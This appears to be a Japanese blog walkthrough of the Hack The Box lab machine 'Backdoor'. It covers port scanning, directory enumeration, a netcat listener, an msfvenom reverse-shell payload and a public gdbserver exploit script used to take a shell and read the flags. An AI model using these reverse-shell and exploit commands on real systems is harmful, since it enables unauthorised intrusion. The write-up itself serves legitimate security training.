セキュリティについて学び、Hack the Boxを取り組んだ記録
現在Active machineなのに、YouTubeに解説動画が挙がっている(1月13日)。
とりあえず、私もBackdoorのWalkthroughを書いておこうと思った。
これも参考にしたらいいよ!
応援お願いします!
もしこの記事が役に立ったり、「おもしろそう!」と思った方は、ぜひ 「いいね」ボタン を押していただけると嬉しいです!みなさんの応援が、次のチャレンジへの大きな励みになります。💪
⚠️ ネタバレ注意 ⚠️
Step. 1 nmapスキャン
最初にマシーンをリセットすること!
指定されたIPアドレスをnmapスキャンすると、SSHとHTTPポートが開いていることが確認できる。
$ nmap -p- 10.10.11.125
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-13 22:25 JST
Nmap scan report for 10.10.11.125
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 1162.83 seconds
ポートが確認できたので、http://10.10.11.125/login.php
で検索すると、ページが表示される。
次に、Gobusterでディレクトリスキャンを試す。
$ gobuster dir -u http://10.10.11.125 -w /usr/share/dirb/wordlists/common.txt
WordPressが80番ポートで使用されているため、admin
などのIDとパスワードを試してログインを試みるが失敗。
Step. 2 脆弱性の発見
Gobusterを使用すると、gdbサーバーで動いていることが確認できる。
エクスプロイトを使用した攻撃
スクリプトをダウンロードし、nc
コマンドで待ち受けポートを起動する。
$ nc -lvnp 4444
リバースシェル用のペイロードをmsfvenom
コマンドで作成:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=xxxxxxx LPORT=4444 PrependFork=true -o shell.bin
xxxx
は自身のIPアドレス。ifconfig
コマンドで確認しておくと安心。
Step. 3 攻撃
ダウンロードしたスクリプトを使用して権限を奪取する(Python3で実行)。
python 50539.py 10.10.11.125:1337 shell.bin
4444ポートに戻って確認すると、きちんとユーザーになっている。
user.txt
とroot.txt
をcat
コマンドで取得し、HPに戻って入力すればFlagを立てることができる。